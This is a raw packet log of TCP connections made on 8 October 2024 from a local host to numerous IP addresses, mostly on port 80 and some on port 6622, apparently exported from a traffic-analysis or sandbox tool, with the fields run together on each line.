                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.828197002 CEST5012880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.828249931 CEST5012880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.833364964 CEST805012818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.848566055 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.851932049 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.857374907 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.857470989 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.857755899 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.857755899 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.862957954 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.863017082 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.984330893 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.044560909 CEST5013980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.049787045 CEST805013947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.049854040 CEST5013980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.050046921 CEST5013980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.050070047 CEST5013980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.055135012 CEST805013947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.055155993 CEST805013947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.140851021 CEST662250136204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.140948057 CEST501366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.141446114 CEST501366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.146220922 CEST662250136204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.227308989 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.227453947 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.227509022 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.230907917 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.235697985 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.253992081 CEST5014080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.258907080 CEST805014018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.259006023 CEST5014080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.699419022 CEST805014654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.892044067 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.896986961 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.898679018 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.898819923 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.898859978 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.903839111 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.903997898 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.110538960 CEST805014547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.110953093 CEST805014547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.111071110 CEST5014580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.111253977 CEST5014580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.116348982 CEST805014547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.505544901 CEST501486622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.510984898 CEST662250148204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.511414051 CEST501486622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.522420883 CEST501486622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.767930984 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.767950058 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768089056 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768100977 CEST8049886165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768120050 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768156052 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768156052 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.768591881 CEST662250148204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.145581961 CEST5014780192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.146946907 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.150486946 CEST80501473.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.151837111 CEST8049886165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.160375118 CEST5014980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.165304899 CEST805014918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.166609049 CEST5014980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.166729927 CEST5014980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.166758060 CEST5014980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.171948910 CEST805014918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.171986103 CEST805014918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.271523952 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.276477098 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.276552916 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.282533884 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.282533884 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.287456989 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.287564993 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.732120991 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.732471943 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.734539032 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.774288893 CEST5015080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.779226065 CEST805015018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.241172075 CEST662250148204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.241266966 CEST501486622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.241468906 CEST501486622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.246397972 CEST662250148204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.367583990 CEST5015180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.372881889 CEST805015113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.372953892 CEST5015180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.379132032 CEST5015180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.379172087 CEST5015180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.567681074 CEST5015880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.573240042 CEST805015818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.573651075 CEST805015818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.865526915 CEST80501563.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.865700960 CEST80501563.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.866553068 CEST5015680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.866553068 CEST5015680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.872234106 CEST80501563.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.886312008 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.891412973 CEST805015935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.894635916 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.894870043 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.894889116 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.901804924 CEST805015935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.902024984 CEST805015935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.636181116 CEST805015935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.636470079 CEST805015935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.636579990 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.636658907 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.641887903 CEST805015935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.662113905 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.667176962 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.670627117 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.670897961 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.670928955 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.676110983 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.676166058 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.915174961 CEST805015818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.915599108 CEST805015818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.915741920 CEST5015880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.915919065 CEST5015880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.921087980 CEST805015818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.958029985 CEST662250157204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.958173990 CEST501576622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.958241940 CEST501576622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.964201927 CEST662250157204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.415119886 CEST5016180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.588723898 CEST805016113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.588865995 CEST5016180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.589046001 CEST5016180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.589068890 CEST5016180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.593935966 CEST805016113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.593949080 CEST805016113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.786619902 CEST501626622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.791695118 CEST662250162204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.791990995 CEST501626622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.796257973 CEST501626622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.801213026 CEST662250162204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.017112017 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.017374039 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.017496109 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.017549038 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.022470951 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.042244911 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.042617083 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.047642946 CEST8049905208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.047816992 CEST8050163208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.327686071 CEST805016744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.328161001 CEST5016780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.328655958 CEST805016744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.328764915 CEST5016780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.332999945 CEST805016744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.494441986 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.499737024 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.499931097 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.500425100 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.500425100 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.505538940 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.505605936 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.589359045 CEST805016918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.589812040 CEST5016980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.590742111 CEST805016918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.590806007 CEST5016980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.594877005 CEST805016918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.625888109 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.631238937 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.634746075 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.634922028 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.634922028 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.640178919 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.640413046 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.968970060 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.970354080 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.970458984 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.972976923 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.978486061 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.387723923 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.388952017 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.390604973 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.490109921 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.496345043 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.513026953 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.518177032 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.518264055 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.535588980 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.535588980 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.540782928 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.540800095 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.586206913 CEST662250168204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.586266994 CEST501686622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.586318970 CEST501686622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.591284037 CEST662250168204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.742261887 CEST5017380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.747447968 CEST805017354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.747523069 CEST5017380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.747864962 CEST5017380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.748222113 CEST5017380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.753004074 CEST805017354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.753494978 CEST805017354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.256568909 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.257108927 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.257158041 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.257424116 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.262037992 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.588195086 CEST5018080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.591124058 CEST805018044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.591193914 CEST5018080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.593241930 CEST805018044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.645842075 CEST501816622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.651582956 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.651650906 CEST662250181204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.652514935 CEST501816622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.655478001 CEST501816622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.656610012 CEST805018272.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.656686068 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.660342932 CEST662250181204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.668971062 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.668987989 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.674876928 CEST805018272.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.674947977 CEST805018272.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.178560019 CEST805018272.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.178895950 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.184715033 CEST5018280192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.191977024 CEST805018272.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.196182966 CEST5018380192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.203437090 CEST805018372.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.203505039 CEST5018380192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.204447985 CEST5018380192.168.2.472.52.178.23
